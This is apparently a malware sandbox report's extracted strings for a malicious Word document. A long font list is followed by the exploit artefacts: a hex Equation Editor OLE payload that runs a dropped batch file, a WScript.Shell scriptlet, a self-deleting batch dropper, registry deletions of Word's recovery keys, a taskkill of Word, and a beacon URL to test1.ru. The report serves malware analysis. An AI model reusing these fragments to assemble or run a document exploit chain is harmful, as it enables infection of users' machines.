Unicode based on Runtime Data (WINWORD.EXE )

Century Schoolbook

Unicode based on Runtime Data (WINWORD.EXE )

Chiller

Unicode based on Runtime Data (WINWORD.EXE )

Colonna MT

Unicode based on Runtime Data (WINWORD.EXE )

Comic Sans MS

Unicode based on Runtime Data (WINWORD.EXE )

Consolas

Unicode based on Runtime Data (WINWORD.EXE )

Constantia

Unicode based on Runtime Data (WINWORD.EXE )

Cooper Black

Unicode based on Runtime Data (WINWORD.EXE )

Copperplate Gothic Bold

Unicode based on Runtime Data (WINWORD.EXE )

Copperplate Gothic Light

Unicode based on Runtime Data (WINWORD.EXE )

Corbel

Unicode based on Runtime Data (WINWORD.EXE )

Cordia New

Unicode based on Runtime Data (WINWORD.EXE )

CordiaUPC

Unicode based on Runtime Data (WINWORD.EXE )

Courier New

Unicode based on Runtime Data (WINWORD.EXE )

Curlz MT

Unicode based on Runtime Data (WINWORD.EXE )

DaunPenh

Unicode based on Runtime Data (WINWORD.EXE )

David

Unicode based on Runtime Data (WINWORD.EXE )

DFKai-SB

Unicode based on Runtime Data (WINWORD.EXE )

DilleniaUPC

Unicode based on Runtime Data (WINWORD.EXE )

DokChampa

Unicode based on Runtime Data (WINWORD.EXE )

Dotum

Unicode based on Runtime Data (WINWORD.EXE )

DotumChe

Unicode based on Runtime Data (WINWORD.EXE )

Ebrima

Unicode based on Runtime Data (WINWORD.EXE )

Edwardian Script ITC

Unicode based on Runtime Data (WINWORD.EXE )

Elephant

Unicode based on Runtime Data (WINWORD.EXE )

Engravers MT

Unicode based on Runtime Data (WINWORD.EXE )

Eras Bold ITC

Unicode based on Runtime Data (WINWORD.EXE )

Eras Demi ITC

Unicode based on Runtime Data (WINWORD.EXE )

Eras Light ITC

Unicode based on Runtime Data (WINWORD.EXE )

Eras Medium ITC

Unicode based on Runtime Data (WINWORD.EXE )

Estrangelo Edessa

Unicode based on Runtime Data (WINWORD.EXE )

EucrosiaUPC

Unicode based on Runtime Data (WINWORD.EXE )

Euphemia

Unicode based on Runtime Data (WINWORD.EXE )

FangSong

Unicode based on Runtime Data (WINWORD.EXE )

Felix Titling

Unicode based on Runtime Data (WINWORD.EXE )

FontInfoCacheW

Unicode based on Runtime Data (WINWORD.EXE )

Footlight MT Light

Unicode based on Runtime Data (WINWORD.EXE )

Forte

Unicode based on Runtime Data (WINWORD.EXE )

Franklin Gothic Book

Unicode based on Runtime Data (WINWORD.EXE )

Franklin Gothic Demi

Unicode based on Runtime Data (WINWORD.EXE )

Franklin Gothic Demi Cond

Unicode based on Runtime Data (WINWORD.EXE )

Franklin Gothic Heavy

Unicode based on Runtime Data (WINWORD.EXE )

Franklin Gothic Medium

Unicode based on Runtime Data (WINWORD.EXE )

Franklin Gothic Medium Cond

Unicode based on Runtime Data (WINWORD.EXE )

FrankRuehl

Unicode based on Runtime Data (WINWORD.EXE )

FreesiaUPC

Unicode based on Runtime Data (WINWORD.EXE )

Freestyle Script

Unicode based on Runtime Data (WINWORD.EXE )

French Script MT

Unicode based on Runtime Data (WINWORD.EXE )

Gabriola

Unicode based on Runtime Data (WINWORD.EXE )

Garamond

Unicode based on Runtime Data (WINWORD.EXE )

Gautami

Unicode based on Runtime Data (WINWORD.EXE )

Georgia

Unicode based on Runtime Data (WINWORD.EXE )

Gill Sans MT

Unicode based on Runtime Data (WINWORD.EXE )

Gill Sans MT Condensed

Unicode based on Runtime Data (WINWORD.EXE )

Gill Sans MT Ext Condensed Bold

Unicode based on Runtime Data (WINWORD.EXE )

Gill Sans Ultra Bold

Unicode based on Runtime Data (WINWORD.EXE )

Gill Sans Ultra Bold Condensed

Unicode based on Runtime Data (WINWORD.EXE )

Gisha

Unicode based on Runtime Data (WINWORD.EXE )

Gloucester MT Extra Condensed

Unicode based on Runtime Data (WINWORD.EXE )

Goudy Old Style

Unicode based on Runtime Data (WINWORD.EXE )

Goudy Stout

Unicode based on Runtime Data (WINWORD.EXE )

Gulim

Unicode based on Runtime Data (WINWORD.EXE )

GulimChe

Unicode based on Runtime Data (WINWORD.EXE )

Gungsuh

Unicode based on Runtime Data (WINWORD.EXE )

GungsuhChe

Unicode based on Runtime Data (WINWORD.EXE )

Haettenschweiler

Unicode based on Runtime Data (WINWORD.EXE )

Harlow Solid Italic

Unicode based on Runtime Data (WINWORD.EXE )

Harrington

Unicode based on Runtime Data (WINWORD.EXE )

High Tower Text

Unicode based on Runtime Data (WINWORD.EXE )

Impact

Unicode based on Runtime Data (WINWORD.EXE )

Imprint MT Shadow

Unicode based on Runtime Data (WINWORD.EXE )

Informal Roman

Unicode based on Runtime Data (WINWORD.EXE )

IrisUPC

Unicode based on Runtime Data (WINWORD.EXE )

Iskoola Pota

Unicode based on Runtime Data (WINWORD.EXE )

JasmineUPC

Unicode based on Runtime Data (WINWORD.EXE )

Jokerman

Unicode based on Runtime Data (WINWORD.EXE )

Juice ITC

Unicode based on Runtime Data (WINWORD.EXE )

KaiTi

Unicode based on Runtime Data (WINWORD.EXE )

Kalinga

Unicode based on Runtime Data (WINWORD.EXE )

Kartika

Unicode based on Runtime Data (WINWORD.EXE )

Khmer UI

Unicode based on Runtime Data (WINWORD.EXE )

KodchiangUPC

Unicode based on Runtime Data (WINWORD.EXE )

Kokila

Unicode based on Runtime Data (WINWORD.EXE )

Kristen ITC

Unicode based on Runtime Data (WINWORD.EXE )

Kunstler Script

Unicode based on Runtime Data (WINWORD.EXE )

Lao UI

Unicode based on Runtime Data (WINWORD.EXE )

LastPurgeTime

Unicode based on Runtime Data (WINWORD.EXE )

Latha

Unicode based on Runtime Data (WINWORD.EXE )

Leelawadee

Unicode based on Runtime Data (WINWORD.EXE )

Levenim MT

Unicode based on Runtime Data (WINWORD.EXE )

LilyUPC

Unicode based on Runtime Data (WINWORD.EXE )

Lucida Bright

Unicode based on Runtime Data (WINWORD.EXE )

Lucida Calligraphy

Unicode based on Runtime Data (WINWORD.EXE )

Lucida Console

Unicode based on Runtime Data (WINWORD.EXE )

Lucida Fax

Unicode based on Runtime Data (WINWORD.EXE )

Lucida Handwriting

Unicode based on Runtime Data (WINWORD.EXE )

Lucida Sans

Unicode based on Runtime Data (WINWORD.EXE )

Lucida Sans Typewriter

Unicode based on Runtime Data (WINWORD.EXE )

Lucida Sans Unicode

Unicode based on Runtime Data (WINWORD.EXE )

Magneto

Unicode based on Runtime Data (WINWORD.EXE )

Maiandra GD

Unicode based on Runtime Data (WINWORD.EXE )

Malgun Gothic

Unicode based on Runtime Data (WINWORD.EXE )

Mangal

Unicode based on Runtime Data (WINWORD.EXE )

Marlett

Unicode based on Runtime Data (WINWORD.EXE )

Matura MT Script Capitals

Unicode based on Runtime Data (WINWORD.EXE )

Meiryo

Unicode based on Runtime Data (WINWORD.EXE )

Meiryo UI

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft Himalaya

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft JhengHei

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft New Tai Lue

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft PhagsPa

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft Sans Serif

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft Tai Le

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft Uighur

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft YaHei

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft Yi Baiti

Unicode based on Runtime Data (WINWORD.EXE )

MingLiU

Unicode based on Runtime Data (WINWORD.EXE )

MingLiU-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

MingLiU_HKSCS

Unicode based on Runtime Data (WINWORD.EXE )

MingLiU_HKSCS-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

Miriam

Unicode based on Runtime Data (WINWORD.EXE )

Miriam Fixed

Unicode based on Runtime Data (WINWORD.EXE )

Mistral

Unicode based on Runtime Data (WINWORD.EXE )

Modern No. 20

Unicode based on Runtime Data (WINWORD.EXE )

Mongolian Baiti

Unicode based on Runtime Data (WINWORD.EXE )

Monotype Corsiva

Unicode based on Runtime Data (WINWORD.EXE )

MoolBoran

Unicode based on Runtime Data (WINWORD.EXE )

MS Gothic

Unicode based on Runtime Data (WINWORD.EXE )

MS Mincho

Unicode based on Runtime Data (WINWORD.EXE )

MS Outlook

Unicode based on Runtime Data (WINWORD.EXE )

MS PGothic

Unicode based on Runtime Data (WINWORD.EXE )

MS PMincho

Unicode based on Runtime Data (WINWORD.EXE )

MS Reference Sans Serif

Unicode based on Runtime Data (WINWORD.EXE )

MS Reference Specialty

Unicode based on Runtime Data (WINWORD.EXE )

MS UI Gothic

Unicode based on Runtime Data (WINWORD.EXE )

MsoCommandBarPopup

Unicode based on Runtime Data (WINWORD.EXE )

MV Boli

Unicode based on Runtime Data (WINWORD.EXE )

Narkisim

Unicode based on Runtime Data (WINWORD.EXE )

NetUICtrlNotifySink

Unicode based on Runtime Data (WINWORD.EXE )

Niagara Engraved

Unicode based on Runtime Data (WINWORD.EXE )

Niagara Solid

Unicode based on Runtime Data (WINWORD.EXE )

NSimSun

Unicode based on Runtime Data (WINWORD.EXE )

Nyala

Unicode based on Runtime Data (WINWORD.EXE )

OCR A Extended

Unicode based on Runtime Data (WINWORD.EXE )

OfficeTooltip

Unicode based on Runtime Data (WINWORD.EXE )

Old English Text MT

Unicode based on Runtime Data (WINWORD.EXE )

Palace Script MT

Unicode based on Runtime Data (WINWORD.EXE )

Palatino Linotype

Unicode based on Runtime Data (WINWORD.EXE )

Papyrus

Unicode based on Runtime Data (WINWORD.EXE )

Parchment

Unicode based on Runtime Data (WINWORD.EXE )

Perpetua

Unicode based on Runtime Data (WINWORD.EXE )

Perpetua Titling MT

Unicode based on Runtime Data (WINWORD.EXE )

Plantagenet Cherokee

Unicode based on Runtime Data (WINWORD.EXE )

Playbill

Unicode based on Runtime Data (WINWORD.EXE )

PMingLiU

Unicode based on Runtime Data (WINWORD.EXE )

PMingLiU-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

Poor Richard

Unicode based on Runtime Data (WINWORD.EXE )

Pristina

Unicode based on Runtime Data (WINWORD.EXE )

Raavi

Unicode based on Runtime Data (WINWORD.EXE )

Rage Italic

Unicode based on Runtime Data (WINWORD.EXE )

Ravie

Unicode based on Runtime Data (WINWORD.EXE )

REListbox20W

Unicode based on Runtime Data (WINWORD.EXE )

Rockwell

Unicode based on Runtime Data (WINWORD.EXE )

Rockwell Condensed

Unicode based on Runtime Data (WINWORD.EXE )

Rockwell Extra Bold

Unicode based on Runtime Data (WINWORD.EXE )

Sakkal Majalla

Unicode based on Runtime Data (WINWORD.EXE )

Script MT Bold

Unicode based on Runtime Data (WINWORD.EXE )

Segoe Print

Unicode based on Runtime Data (WINWORD.EXE )

Segoe Script

Unicode based on Runtime Data (WINWORD.EXE )

Segoe UI

Unicode based on Runtime Data (WINWORD.EXE )

Segoe UI Light

Unicode based on Runtime Data (WINWORD.EXE )

Segoe UI Semibold

Unicode based on Runtime Data (WINWORD.EXE )

Segoe UI Symbol

Unicode based on Runtime Data (WINWORD.EXE )

Shonar Bangla

Unicode based on Runtime Data (WINWORD.EXE )

Showcard Gothic

Unicode based on Runtime Data (WINWORD.EXE )

Shruti

Unicode based on Runtime Data (WINWORD.EXE )

SimHei

Unicode based on Runtime Data (WINWORD.EXE )

Simplified Arabic

Unicode based on Runtime Data (WINWORD.EXE )

Simplified Arabic Fixed

Unicode based on Runtime Data (WINWORD.EXE )

SimSun

Unicode based on Runtime Data (WINWORD.EXE )

SimSun-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

Snap ITC

Unicode based on Runtime Data (WINWORD.EXE )

Stencil

Unicode based on Runtime Data (WINWORD.EXE )

Sylfaen

Unicode based on Runtime Data (WINWORD.EXE )

Tahoma

Unicode based on Runtime Data (WINWORD.EXE )

Tempus Sans ITC

Unicode based on Runtime Data (WINWORD.EXE )

Traditional Arabic

Unicode based on Runtime Data (WINWORD.EXE )

Trebuchet MS

Unicode based on Runtime Data (WINWORD.EXE )

Tunga

Unicode based on Runtime Data (WINWORD.EXE )

Tw Cen MT

Unicode based on Runtime Data (WINWORD.EXE )

Tw Cen MT Condensed

Unicode based on Runtime Data (WINWORD.EXE )

Tw Cen MT Condensed Extra Bold

Unicode based on Runtime Data (WINWORD.EXE )

Utsaah

Unicode based on Runtime Data (WINWORD.EXE )

Verdana

Unicode based on Runtime Data (WINWORD.EXE )

Vijaya

Unicode based on Runtime Data (WINWORD.EXE )

Viner Hand ITC

Unicode based on Runtime Data (WINWORD.EXE )

Vivaldi

Unicode based on Runtime Data (WINWORD.EXE )

Vladimir Script

Unicode based on Runtime Data (WINWORD.EXE )

Vrinda

Unicode based on Runtime Data (WINWORD.EXE )

Webdings

Unicode based on Runtime Data (WINWORD.EXE )

Wide Latin

Unicode based on Runtime Data (WINWORD.EXE )

Wingdings

Unicode based on Runtime Data (WINWORD.EXE )

Wingdings 2

Unicode based on Runtime Data (WINWORD.EXE )

Wingdings 3

Unicode based on Runtime Data (WINWORD.EXE )

<![CDATA[

Ansi based on Dropped File (inteldriverupd1.sct)

</registration>

Ansi based on Dropped File (inteldriverupd1.sct)

</script>

Ansi based on Dropped File (inteldriverupd1.sct)

</scriptlet>

Ansi based on Dropped File (inteldriverupd1.sct)

<?XML version="1.0"?>

Ansi based on Dropped File (inteldriverupd1.sct)

<registration

Ansi based on Dropped File (inteldriverupd1.sct)

Ansi based on Dropped File (inteldriverupd1.sct)

Ansi based on Dropped File (inteldriverupd1.sct)

classid="{204774CF-D251-4F02-855B-2BE70585184B}"

Ansi based on Dropped File (inteldriverupd1.sct)

description="fjzmpcjvqp"

Ansi based on Dropped File (inteldriverupd1.sct)

ObjShell.Run "CmD /C %TeMp%\TaSk.BaT",0,True

Ansi based on Dropped File (inteldriverupd1.sct)

progid="fjzmpcjvqp"

Ansi based on Dropped File (inteldriverupd1.sct)

remotable="true"

Ansi based on Dropped File (inteldriverupd1.sct)

Set ObjShell = CreateObject("WScript.Shell")

Ansi based on Dropped File (inteldriverupd1.sct)

Set ObjShell = Nothing

Ansi based on Dropped File (inteldriverupd1.sct)

version="1.00"

Ansi based on Dropped File (inteldriverupd1.sct)

>Root EntryFpMl7Ole

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

\bin2633OLE2Link

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

\objdata \mmath

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

\objdata \mmath\bin-00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000039B1A0B1020000000B0000004571756174696F6E2E33000000000000000000000E0000D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF0900060000000000000000000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFF04000000FEFFFFFF05000000FEFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500FFFFFFFFFFFFFFFF0200000002CE020000000000C000000000000046000000000000000000000000C096012E4C8AD30103000000000300000000000001004F006C00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A000201FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006F006D0070004F0062006A00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000004000000FFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000001000000690000000000000003004F0062006A0049006E0066006F0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000FEFFFFFF02000000FEFFFFFFFEFFFFFF0500000006000000070000000800000009000000FEFFFFFF0B000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF010000020800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100FEFF030A0000FFFFFFFF02CE020000000000C0000000000000461A0000004D6963726F736F667420B9ABCABD20332E3020D6D0CEC4B0E6000C0000004453204571756174696F6E000B0000004551754154696F6E2E3300F439B271000000000000000000000000000000000000000000000000000000000000000000000000000300040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF030000000400000001000000FFFFFFFF0000000000000000050F00001102000056010000010009000003AB00000002001C00000000000500000009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02E001A00D1200000026060F001A00FFFFFFFF000010000000C0FFFFFFACFFFFFF600D00008C0100000B00000026060F000C004D61746854797065000030001C000000FB0280FE000000000000BC020000000004020040436F6D69632053616E73204D5300DFE8FEFFFFFF53180A3400000A0000000000040000002D0100000A000000320A80012E0905000000626302004F006C0065005000720065007300300030003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000180002010300000005000000FFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000040000007E010000000000006500510055004100540049004F004E0020004E00410054004900560045000000000000000000000000000000000000000000000000000000000000000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000A00000061000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000646566000C000000320A80011C000A000000313233343536373839610A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC02000000860102022253797374656D000048008A0000000A00FA17660548008A00FFFFFFFFB8EC1900040000002D01010004000000F001000003000000000000001C0000000200BEC34500000000000000282468007CA8690000000000030000000000080000436D44202F432025746D70255C7461736B2E6261742020202020202020202020202026205555555555555555120C6300440002816500028166000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000D0000004D45544146494C455049435400E3090000D4F4FFFF020400000800E3092C0B0000010009000003FD01000005001C00000000000400000003010800050000000B0200000000050000000C02A4025702040000002E0118001C000000FB02A4FF0000000000009001000000000440002243616C6962726900000000000000000000000000000000000000000000000000040000002D010000040000002D010000040000002D010000040000000201010005000000090200000002030000001E00070000001604A4025602000000000C00000040096200FF0000000000000058025802FFFF000007000000FC020000FFFFFF020000040000002D01010007000000FC020000000000020000040000002D0102000C00000040092100F00000000000000006000600FFFF0000040000002D010100040000002D0102000C00000040092100F00000000000000006000600FFFF0000040000002D010100040000002D0102000C00000040092100F00000000000000006004C02FFFF0600040000002D01010005000000090200000002050000000102FFFFFF02040000002D0102000C00000040092100F00000000000000006000600FFFF5202040000002D010100040000002D0102000C00000040092100F00000000000000006000600FFFF5202040000002D01010005000000090200000002050000000102FFFFFF02040000002D0102000C00000040092100F0000000000000004C02060005000000040000002D01010005000000090200000002050000000102FFFFFF02040000002D0102000C00000040092100F0000000000000004C02060005005202040000002D01010005000000090200000002050000000102FFFFFF02040000002D0102000C00000040092100F0000000000000000600060051020000040000002D010100040000002D0102000C00000040092100F0000000000000000600060051020000040000002D010100040000002D0102000C00000040092100F00000000000000006004C0251020600040000002D01010005000000090200000002050000000102FFFFFF02040000002D0102000C00000040092100F0000000000000000600060051025202040000002D010100040000002D0102000C00000040092100F0000000000000000600060051025202040000002D01010005000000090200000002050000000102FFFFFF0207000000FC020000FFFFFF000000040000002D010300040000002701FFFF040000002D010000040000002D010000040000002D010000050000000902000000020D000000320A5702580201000400000000005602A40220003600050000000902000000021C000000FB021000070000000000BC02000000000102022253797374656D0000690D461E2080AC1480C28B75D0811D00A004817580C28B75040000002D010400040000002D01040004000000F0010200030000000000

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

\object\objemb\objupdate\v

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

\object\objhtml\objupdate\v

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

\object\objhtml\v

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

ObjInfoLinkInfoFF82%TMp%\InTeLdRiVeRuPd1.ScTu~*Ff`7

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

{\field{\*\fldinst{INCLUDEPICTURE "http://test1.ru/newbuild/t.php?stats=send&thread=0" MERGEFORMAT \\d \\w0001 \\h0001 \\pm1 \\px0 \\py0 \\pw0}}}}

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

}numbernfigureversionhigh

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

Ansi based on Dropped File (~WRS{E674B11D-078C-4013-8D68-BC57AFC19CCF}.tmp)

Del "%~f0"

Ansi based on Dropped File (task.bat)

ECHO OFF

Ansi based on Dropped File (task.bat)

ECHO OFFset uu="%TMp%\block.txt"IF EXIST %uu% (exit) ELSE (set uu="%TMp%\block.txt" & copy NUL %uu% & start /b %TMp%\2nd.bat)Del "%~f0"exit

Ansi based on Dropped File (task.bat)

IF EXIST %uu% (exit) ELSE (set uu="%TMp%\block.txt" & copy NUL %uu% & start /b %TMp%\2nd.bat)

Ansi based on Dropped File (task.bat)

set uu="%TMp%\block.txt"

Ansi based on Dropped File (task.bat)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Resiliency /f

Ansi based on Process Commandline (reg.exe)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Resiliency /f

Ansi based on Process Commandline (reg.exe)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency /f

Ansi based on Process Commandline (reg.exe)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency /f

Ansi based on Process Commandline (reg.exe)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Resiliency /f

Ansi based on Process Commandline (reg.exe)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency /f

Ansi based on Process Commandline (reg.exe)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Resiliency /f

Ansi based on Process Commandline (reg.exe)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Resiliency /f

Ansi based on Process Commandline (reg.exe)

REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\10.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (reg.exe)

REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\11.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (reg.exe)

REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\12.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (reg.exe)

REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\14.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (reg.exe)

REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (reg.exe)

REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (reg.exe)

REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\8.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (reg.exe)

REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (reg.exe)

taskkill /f /im WiNwOrD.ExE

Ansi based on Process Commandline (taskkill.exe)

test1.ru

Ansi based on PCAP Processing (PCAP)

TIMEOUT 1

Ansi based on Process Commandline (timeout.exe)

Extracted Files

Malicious 1

exe.exe

Overview Download Disabled Extended File Details VirusTotal Report Hash Seen Before

Size
51KiB (51712 bytes)

Type
peexe executable

Description
PE32 executable (GUI) Intel 80386, for MS Windows

